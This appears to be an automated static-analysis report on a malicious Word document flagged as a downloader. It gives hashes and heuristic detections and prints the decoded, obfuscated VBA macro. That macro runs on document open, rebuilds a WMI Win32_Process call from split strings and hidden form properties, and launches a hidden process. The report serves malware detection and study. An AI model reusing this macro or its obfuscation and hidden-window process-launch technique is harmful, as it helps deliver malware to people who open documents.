Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2fe2806aaa7485cb…

MALICIOUS

Office (OLE)

184.6 KB Created: 2019-12-13 20:15:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: b5feadfbc9851764ac4ce92dea6801d1 SHA-1: ae6491179cad18363e94e268f976407d8c2b9389 SHA-256: 2fe2806aaa7485cba0719ec3781b64f73ad38c18da0f1b5ae3536a6378d9817c
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Sagent-7454029-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-7454029-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Cqfhnrokw = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wvmalqaed.Xafmjubswzkvh + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Hcopysxragjqb = CreateObject(Null & Cqfhnrokw)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10966 bytes
SHA-256: 8b140e455a34f8aa92109811060058b938672f863f8a9ca7d458fa6e659b1eb2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
230 of 354 identifiers look randomly generated (e.g. 'winOMDNmgmOMDNts') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Wvmalqaed"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Xafmjubswzkvh, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Lhzuefqeoualy = Jjtcjzakdxoxc
Datpclovfiq = Qgcluecuhva
Xwxqhnvbqa = Eounnutomt
Select _
 Case Ddxgtvesrsns
      Case 972
         Adqmzglbqqh _
         = Hex _
         (814)
         Bhjxdzdmepoi = CVar(207)
         Yrmacqytpxau _
         = Hex(699)
      Case 872
         Bnhymbdliu = CVar(368)
         Ucwnbefkmkdq _
         = 488
         Vhrlxjiulri = CDate _
         (108)
      Case 538
         Ssnjrqjvwxcw = _
         CInt(932)
         Gwrjqtvgvtw = Log(Kaqefmim)
         Alavvzkppcucx = Rvzmwunvp
End Select
   Ngpafhkxkn = Vfbdtvztvff
Xprjuzujjgvrg = Buantyxyqiux
Nibtdhstnpnre = Fmnzgraescxzq
Select _
 Case Ackkwyuy
      Case 640
         Aigkzcumzkv _
         = Hex _
         (769)
         Dhndiqfhbrmpl = CVar(46)
         Palokkgjuuta _
         = Hex(627)
      Case 729
         Rrftegcjumh = CVar(633)
         Yquuouzwy _
         = 751
         Wnxysjpqc = CDate _
         (161)
      Case 460
         Agwgasgfyg = _
         CInt(46)
         Itzzffer = Log(Xwrjeqlxqumo)
         Yhugpsaajjp = Jjkydrjjzpro
End Select
   Fhlatmzc = Hruzpaapt
Exmdazpkort = Xufldbzw
Tpbiqnswrjm = Ywtnjsloop
Select _
 Case Vuomsxto
      Case 274
         Oyrzwwubsrwk _
         = Hex _
         (529)
         Koqeezezlfu = CVar(765)
         Kzlslafh _
         = Hex(216)
      Case 197
         Kvotmxzglnybe = CVar(927)
         Kjopnledskc _
         = 403
         Kkbiprfiqgscl = CDate _
         (830)
      Case 298
         Gfivecbqqs = _
         CInt(292)
         Fsvjkrzwal = Log(Mbhudwmbmv)
         Bgcwitlpiha = Wikldiupwjcv
End Select
Mybqpirouq
End Sub


Attribute VB_Name = "Kopbukxsd"
Attribute VB_Base = "0{B641B2EB-DC93-416B-BEA6-8182BA37ABEF}{EC934842-EAC4-4E0F-ABBD-E9134B1B0760}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Yjnrqrtuutmgd"
Function Jxohkkahqtvg()
   Tlikltzxt = Gourbdmzhh
Kxuipgvqwxhvm = Qmpdrdxkkbtvi
Yzolynrkjr = Pigyfrevm
Select _
 Case Nwnmjhvk
      Case 806
         Mzhhallzcf _
         = Hex _
         (98)
         Vhbdcoedixgw = CVar(352)
         Kahcoglwdjy _
         = Hex(160)
      Case 21
         Ftvjlqtbf = CVar(845)
         Eggkdoslf _
         = 826
         Lsarghye = CDate _
         (469)
      Case 173
         Ljzkmnvfh = _
         CInt(871)
         Pbxhzbtor = Log(Uehdjujmca)
         Txhzqaxf = Wvqcjggfqarzo
End Select
Zxwqjvefztk = Wvmalqaed.Xafmjubswzkvh
   Hszgkzgq = Xvyozibhmikb
Ezpedqvnrrdhg = Rqiytsrxul
Nuepfqbbkkcmw = Dhkrbdwvrc
Select _
 Case Encvsxris
      Case 868
         Xqfvzgov _
         = Hex _
         (594)
         Ioqjufuqzmmc = CVar(837)
         Oipjpfrrpfmaw _
         = Hex(557)
      Case 339
         Ocgbnwzllxrwr = CVar(569)
         Ovhhgqre _
         = 922
         Crykwujmtkkgb = CDate _
         (89)
      Case 527
         Pwdlxizx = _
         CInt(903)
         Rsobfxxaeke = Log(Odikxjqi)
         Grtotiocuk = Culnnmfxk
End Select
Qaaydpknm = Zxwqjvefztk + Kopbukxsd.Oudrjneamo + Kopbukxsd.Liivbpuc + Kopbukxsd.Ubrfolzplf
   Btripuhispsn = Qiwiwteeaa
Vpkfzgeosehyo = Sklfuwkxhcp
Pxsrxpyrynp = Gumbxuofmt
Select _
 Case Pclsdckaoyvl
      Case 998
         Ykwtxvtl _
         = Hex _
         (906)
         Lffurkdddwi = CVar(187)
         Zvkeluhzblw _
         = Hex(442)
      Case 57
         Jswtbdmv = CVar(840)
         Xqjevrhtslwwy _
         = 822
         Hrjrjujzmak = CDate _
         (773)
      Case 591
         Ueassynobp = _
         CInt(936)
         Tsdjhmukc = Log(Ddxcnqwekl)
         Oleeaycfbwjqc = Fnqvhasxovv
End Select
Gjrfhzfxhpqqe = Qaaydpknm + Kopbukxsd.Kyvmmurntvuio + Kopbukxsd.Xhgccpwdsucg.ControlTipText
   Lwgoefvozog = Camxihzx
Osghhlzyw = Hucbhtlslzqg
Fvqmghrzr = Xyndaqjqivgk
Select _
 Case Ooeagymq
      Case 219
         Pjlpqdhd _
         = Hex _
         (192)
         Jvxpljgqh = CVar(945)
         Ltlstmykujgxl _
         = Hex(376)
      Case 555
         Euaenczprsq = CVar(781)
         Xswjpcdpzxw _
         = 835
         Sqwcxmbuel = CDate _
         (254)
      Case 598
         Xwmduzcx = _
         CInt(662)
         Cnxiikbfxdo = Log(Jtoudnusgg)
         Frlfxuszfoj = Ertzomntmck
End Select
Jxohkkahqtvg = Iqrdaanhqg + Gjrfhzfxhpqqe + Iqrdaanhqg
   Koruestpzgpfv = Verappgbu
Zypxoqquhn = Dfeiuwcvntadx
Gjenwatsvzcsy = Irghovkg
Select _
 Case Ryxfxlznu
      Case 45
         Dasxjmiise _
         = Hex _
         (835)
         Mljxqnavc = CVar(239)
         Fcvnyoced _
         = Hex(237)
      Case 814
         Ernjeibxtan = CVar(855)
         Toniauojls _
         = 233
         Nzkupzbbxgsj = CDate _
         (531)
      Case 870
         Suezhskkt = _
         CInt(686)
         Teiqftya = Log(Jqddbmponwdb)
         Uelkukcf = Wvskrmtisqid
End Select
End Function
Function Mybqpirouq()
   Zndlbecyhucv = Yhtnulauckfld
Tjmjolzclpgop = Aqhwjinidg
Ltgqayyok = Hozfhxowlu
Select _
 Case Pegurgbjcu
      Case 458
         Ifzfqqmylez _
         = Hex _
         (195)
         Cfkojikskq = CVar(60)
         Dhhjfjnhmxcx _
         = Hex(165)
      Case 879
         Uivylfylo = CVar(888)
         Utlwvyoomni _
         = 240
         Fulbxfcmfen = CDate _
         (457)
      Case 971
         Lfgustgtlqclq = _
         CInt(446)
         Jwsmdgtqtxn = Log(Dooxuymiirvpx)
         Ejphgodjlbyp = Mxelipwbeqs
End Select
Cqfhnrokw = Join(Split("winOMDNmgmOMDNts:WiOMDNn32_OMDN", "OMDN"), "") + Wvmalqaed.Xafmjubswzkvh + "rocess"
   Vvilaxrvwihdz = Jrpfqvlgoycp
Jdmcbdef = Gjuyvkrp
Vepyndkotmy = Tmeuaymoelmzg
Select _
 Case Kehmphgeoop
      Case 451
         Plsfyoblqqrq _
         = Hex _
         (110)
         Rtczhcxdpflso = CVar(285)
         Qgkauyssg _
         = Hex(315)
      Case 203
         Zbunqvbhpklo = CVar(945)
         Ulvntgzpczkg _
         = 673
         Byawypdvjcpp = CDate _
         (770)
      Case 15
         Wxfrdfznw = _
         CInt(388)
         Urjzudjgig = Log(Oqsrybtxep)
         Futdktnbvjex = Oyfjiafnqbkob
End Select
Set Hcopysxragjqb = CreateObject(Null & Cqfhnrokw)
   Ztxarwknypa = Cvwaabvgn
Jepmvdoybp = Xygjjtnw
Kagiscpdimao = Hxsvbbvspty
Select _
 Case Rmmzwnnupgnl
      Case 273
         Yhaajgtclb _
         = Hex _
         (522)
         Tzrkmjpjxrvm = CVar(158)
         Dtrqejqs _
         = Hex(813)
      Case 74
         Ptpvzpalhb = CVar(804)
         Cfudvblhlnw _
         = 674
         Akvwifbc = CDate _
         (515)
      Case 883
         Ttujiqkfdgpq = _
         CInt(159)
         Boogqzcxhszef = Log(Wslvkbjarcqbh)
         Mjyyvuqu = Svmckelvg
End Select
Poaahdhup = Cqfhnrokw + Kopbukxsd.Vryoitvobufd.ControlTipText + Kopbukxsd.Trpgjcjfab.ControlTipText
   Ehmojsdkttfzr = Ocnepgqcpbfl
Smtiqsuwn = Ixtlpoxct
Qvvsnfxndgzga = Rahzrohzgj
Select _
 Case Amijkstwymy
      Case 431
         Zacyirtfdxw _
         = Hex _
         (949)
         Ukjwojqowaux = CVar(144)
         Hjnecdksnea _
         = Hex(671)
      Case 91
         Dlxoloqyjnbx = CVar(313)
         Acaibtdlvqt _
         = 429
         Jbwevrsmczli = CDate _
         (825)
      Case 243
         Oxwlgopkpnwye = _
         CInt(417)
         Qgvrwgxnjggw = Log(Dozstpoyengbz)
         Hwmevmsqr = Rknfzrpmmzxg
End Select
Kvqhkoey = Poaahdhup + Wvmalqaed.Xafmjubswzkvh
   Yhtrqeronn = Uwktdnnvk
Niylcgznhg = Nybcixbhcs
Unfatbhbrwfi = Oinzbaokxvbl
Select _
 Case Jajvzgqpazugz
      Case 406
         Rsskpittcqje _
         = Hex _
         (398)
         Kyhwisrmkjk = CVar(123)
         Hoevajpfcibpp _
         = Hex(404)
      Case 299
         Gfqcgzpan = CVar(491)
         Mdeijznjmex _
         = 450
         Vukipggtc = CDate _
         (756)
      Case 89
         Ftivzrnrl = _
         CInt(631)
         Matzbcgdbjjhh = Log(Hkhdxksydqr)
         Urgkyyijoq = Nyjwvlai
End Select
Set Mybqpirouq = CreateObject(Kvqhkoey)
   Nuinegpcb = Pcmzfwqgxwab
Zswduycg = Cohksejfqyhi
Vbnovhntyl = Szhrsiksxqo
Select _
 Case Snukmuqxkhs
      Case 720
         Lkgiqweelky _
         = Hex _
         (24)
         Yycoengac = CVar(493)
         Ilqopirogdxa _
         = Hex(160)
      Case 390
         Asbjgcwmgvs = CVar(867)
         Cfenjpoaefqod _
         = 97
         Scbyqzeufq = CDate _
         (654)
      Case 42
         Vwfvwulojbpo = _
         CInt(439)
         Ovmkudjnteute = Log(Kzxnxsdzkttre)
         Mnntliiuvsi = Aacqpqzc
End Select
Mybqpirouq.XSize = False * False
   Oeqchdvsnmdxy = Kjyrjvvzxk
Fgicfyjbhy = Bzqqkwjqzfr
Dodtetsqtqm = Yyolblmlpk
Select _
 Case Paaakzobl
      Case 248
         Gidfewijdk _
         = Hex _
         (941)
         Lbodgtfneynos = CVar(71)
         Iqxdywnicyf _
         = Hex(18)
      Case 152
         Haaupboywwi = CVar(695)
         Oghuommfa _
         = 252
         Gbbxtmfal = CDate _
         (744)
      Case 896
         Dytyrcslt = _
         CInt(438)
         Sihbhjtvjgiu = Log(Zqejrixqhdj)
         Vjnoyrljtqs = Hpfzudgkrlnbc
End Select
Mybqpirouq.YSize = False * False
   Ofvqarnmorr = Yjpiyxop
Opsyiwozayo = Tgmwyuealp
Vaqvojazshahs = Zrqnozxvclb
Select _
 Case Knczvamvydmo
      Case 404
         Tmgeeteeivciz _
         = Hex _
         (838)
         Ojntepeea = CVar(538)
         Suandyzadjwh _
         = Hex(423)
      Case 334
         Qfegxmboqktzv = CVar(892)
         Phfsmajeus _
         = 111
         Yuvrcqwnkz = CDate _
         (805)
      Case 124
         Zqeeptec = _
         CInt(751)
         Ocrokwhbkot = Log(Tvsrjzvz)
         Btwvfoanbu = Saogzgipj
End Select
Do While Hcopysxragjqb.Create(Null & Jxohkkahqtvg, Eitzrheac, Mybqpirouq)
Loop
   Urykpmrlxbvw = Fmvmizztaz
Sbyqgbugeca = Dnkogympwyt
Tkvaqygatpmhu = Jecmivfl
Select _
 Case Tbszwcfbh
      Case 130
         Kelbgqjyxg _
         = Hex _
         (633)
         Kgswhgco = CVar(726)
         Uxxoaxmhg _
         = Hex(261)
      Case 359
         Syzqkcfvnr = CVar(387)
         Witegxvft _
         = 527
         Joerpmmqa = CDate _
         (863)
      Case 300
         Rhsfwdwslovp = _
         CInt(856)
         Htfjkhsht = Log(Gkqjbbyh)
         Llbbriazpoz = Isggpszknd
End Select
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.